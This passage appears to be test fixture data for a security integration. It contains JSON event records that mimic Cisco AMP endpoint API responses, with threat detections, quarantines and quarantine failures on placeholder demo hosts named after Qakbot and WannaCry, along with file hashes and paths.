Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt 
Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0
fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
